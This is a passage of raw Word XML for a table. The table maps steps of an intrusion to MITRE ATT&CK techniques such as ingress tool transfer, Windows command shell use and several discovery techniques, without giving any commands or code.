          <w:p w14:paraId="5833F763" w14:textId="77777777" w:rsidR="003168F8" w:rsidRPr="002D1D50" w:rsidRDefault="003168F8" w:rsidP="00EE0C91">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5CA67358" w14:textId="77777777" w:rsidR="003168F8" w:rsidRPr="002D1D50" w:rsidRDefault="003168F8" w:rsidP="00EE0C91">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>T1105 Ingress Tool Transfer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="78A3E3C3" w14:textId="77777777" w:rsidR="003168F8" w:rsidRPr="002D1D50" w:rsidRDefault="003168F8" w:rsidP="00EE0C91">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4265A627" w14:textId="77777777" w:rsidR="003168F8" w:rsidRPr="002D1D50" w:rsidRDefault="003168F8" w:rsidP="00EE0C91">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="50A3F8D0" w14:textId="77777777" w:rsidR="003168F8" w:rsidRPr="002D1D50" w:rsidRDefault="003168F8" w:rsidP="00EE0C91">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3D8D2AD0" w14:textId="77777777" w:rsidR="003168F8" w:rsidRPr="002D1D50" w:rsidRDefault="003168F8" w:rsidP="00EE0C91">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2126" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6BB052F0" w14:textId="77777777" w:rsidR="003168F8" w:rsidRPr="002D1D50" w:rsidRDefault="003168F8" w:rsidP="00EE0C91">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Install upgraded tool</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003168F8" w:rsidRPr="00B857D7" w14:paraId="76C5C3E5" w14:textId="77777777" w:rsidTr="00EE0C91">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="27285AE9" w14:textId="77777777" w:rsidR="003168F8" w:rsidRPr="00B857D7" w:rsidRDefault="003168F8" w:rsidP="00EE0C91">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="523457D6"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3D1A999D"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T1059.003 Command and Scripting Interpreter: Windows Command Shell</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4083F2F4" w14:textId="77777777" w:rsidR="003168F8" w:rsidRPr="00B857D7" w:rsidRDefault="003168F8" w:rsidP="00EE0C91">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="210C4918" w14:textId="77777777" w:rsidR="003168F8" w:rsidRPr="00B857D7" w:rsidRDefault="003168F8" w:rsidP="00EE0C91">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6F5CD803" w14:textId="77777777" w:rsidR="003168F8" w:rsidRPr="00B857D7" w:rsidRDefault="003168F8" w:rsidP="00EE0C91">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="57D7D111" w14:textId="77777777" w:rsidR="003168F8" w:rsidRPr="00B857D7" w:rsidRDefault="003168F8" w:rsidP="00EE0C91">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2126" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0D7C5B43" w14:textId="77777777" w:rsidR="003168F8" w:rsidRPr="00B857D7" w:rsidRDefault="003168F8" w:rsidP="00EE0C91">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B857D7">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve">Still part of Initial Access step. Commands executed </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>via .bat. Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003168F8" w:rsidRPr="00B857D7" w14:paraId="30EE0F14" w14:textId="77777777" w:rsidTr="00EE0C91">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1BF92EFD" w14:textId="77777777" w:rsidR="003168F8" w:rsidRPr="00B857D7" w:rsidRDefault="003168F8" w:rsidP="00EE0C91">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="418C710F" w14:textId="72155239" w:rsidR="003168F8" w:rsidRPr="00B857D7" w:rsidRDefault="003168F8" w:rsidP="00EE0C91">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B857D7">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>TA00</w:t>
            </w:r>
            <w:r w:rsidR="00F11AE8">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
            <w:r w:rsidRPr="00B857D7">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>7 Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2408" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="43DA1B6C"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T1083 File and Directory Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="215AE94F" w14:textId="77777777" w:rsidR="003168F8" w:rsidRPr="00B857D7" w:rsidRDefault="003168F8" w:rsidP="00EE0C91">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="37B544D4" w14:textId="77777777" w:rsidR="003168F8" w:rsidRPr="00B857D7" w:rsidRDefault="003168F8" w:rsidP="00EE0C91">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="401E5DA5" w14:textId="77777777" w:rsidR="003168F8" w:rsidRPr="00B857D7" w:rsidRDefault="003168F8" w:rsidP="00EE0C91">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="67FB5A9B" w14:textId="77777777" w:rsidR="003168F8" w:rsidRPr="00B857D7" w:rsidRDefault="003168F8" w:rsidP="00EE0C91">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2126" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="30CFDA14" w14:textId="77777777" w:rsidR="003168F8" w:rsidRPr="00B857D7" w:rsidRDefault="003168F8" w:rsidP="00EE0C91">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003168F8" w:rsidRPr="00ED5880" w14:paraId="26DC1E0F" w14:textId="77777777" w:rsidTr="00EE0C91">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="37C535A1" w14:textId="77777777" w:rsidR="003168F8" w:rsidRPr="00ED5880" w:rsidRDefault="003168F8" w:rsidP="00EE0C91">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="23A72048" w14:textId="37005057" w:rsidR="003168F8" w:rsidRPr="00ED5880" w:rsidRDefault="003168F8" w:rsidP="00EE0C91">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00ED5880">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>TA00</w:t>
            </w:r>
            <w:r w:rsidR="00F11AE8">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
            <w:r w:rsidRPr="00ED5880">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>7 Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2408" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5D8E25DF" w14:textId="77777777" w:rsidR="003168F8" w:rsidRPr="00ED5880" w:rsidRDefault="003168F8" w:rsidP="00EE0C91">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00ED5880">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T1082 System Information Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="314FD34C" w14:textId="77777777" w:rsidR="003168F8" w:rsidRPr="00ED5880" w:rsidRDefault="003168F8" w:rsidP="00EE0C91">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5E69EB0A" w14:textId="77777777" w:rsidR="003168F8" w:rsidRPr="00ED5880" w:rsidRDefault="003168F8" w:rsidP="00EE0C91">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="206AD612" w14:textId="77777777" w:rsidR="003168F8" w:rsidRPr="00ED5880" w:rsidRDefault="003168F8" w:rsidP="00EE0C91">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3DA3388C" w14:textId="77777777" w:rsidR="003168F8" w:rsidRPr="00ED5880" w:rsidRDefault="003168F8" w:rsidP="00EE0C91">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2126" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="39BD1BB1" w14:textId="77777777" w:rsidR="003168F8" w:rsidRPr="00ED5880" w:rsidRDefault="003168F8" w:rsidP="00EE0C91">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003168F8" w:rsidRPr="00ED5880" w14:paraId="59689CEF" w14:textId="77777777" w:rsidTr="00EE0C91">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6579E73C" w14:textId="77777777" w:rsidR="003168F8" w:rsidRPr="00ED5880" w:rsidRDefault="003168F8" w:rsidP="00EE0C91">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="10A8D512" w14:textId="2216E85B" w:rsidR="003168F8" w:rsidRPr="00ED5880" w:rsidRDefault="003168F8" w:rsidP="00EE0C91">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00ED5880">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>TA00</w:t>
            </w:r>
            <w:r w:rsidR="00F11AE8">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
            <w:r w:rsidRPr="00ED5880">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>7 Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2408" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3802D913" w14:textId="77777777" w:rsidR="003168F8" w:rsidRPr="00ED5880" w:rsidRDefault="003168F8" w:rsidP="00EE0C91">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00ED5880">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T1016 System Network Configuration Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="604E76F5" w14:textId="77777777" w:rsidR="003168F8" w:rsidRPr="00ED5880" w:rsidRDefault="003168F8" w:rsidP="00EE0C91">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3D3672AA" w14:textId="77777777" w:rsidR="003168F8" w:rsidRPr="00ED5880" w:rsidRDefault="003168F8" w:rsidP="00EE0C91">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6CD9BF8B" w14:textId="77777777" w:rsidR="003168F8" w:rsidRPr="00ED5880" w:rsidRDefault="003168F8" w:rsidP="00EE0C91">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="789624E3" w14:textId="77777777" w:rsidR="003168F8" w:rsidRPr="00ED5880" w:rsidRDefault="003168F8" w:rsidP="00EE0C91">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2126" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="33122029" w14:textId="77777777" w:rsidR="003168F8" w:rsidRPr="00ED5880" w:rsidRDefault="003168F8" w:rsidP="00EE0C91">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003168F8" w:rsidRPr="00ED5880" w14:paraId="5984EB78" w14:textId="77777777" w:rsidTr="00EE0C91">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1D596713" w14:textId="77777777" w:rsidR="003168F8" w:rsidRPr="00ED5880" w:rsidRDefault="003168F8" w:rsidP="00EE0C91">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="09D40D1C" w14:textId="63DCC139" w:rsidR="003168F8" w:rsidRPr="00ED5880" w:rsidRDefault="003168F8" w:rsidP="00EE0C91">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00ED5880">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>TA00</w:t>
            </w:r>
            <w:r w:rsidR="00F11AE8">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
            <w:r w:rsidRPr="00ED5880">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>7 Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2408" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2707B068" w14:textId="77777777" w:rsidR="003168F8" w:rsidRPr="00ED5880" w:rsidRDefault="003168F8" w:rsidP="00EE0C91">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00ED5880">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T1007 System Service Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6D075953" w14:textId="77777777" w:rsidR="003168F8" w:rsidRPr="00ED5880" w:rsidRDefault="003168F8" w:rsidP="00EE0C91">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4DFAB34C" w14:textId="77777777" w:rsidR="003168F8" w:rsidRPr="00ED5880" w:rsidRDefault="003168F8" w:rsidP="00EE0C91">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="25BD450D" w14:textId="77777777" w:rsidR="003168F8" w:rsidRPr="00ED5880" w:rsidRDefault="003168F8" w:rsidP="00EE0C91">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
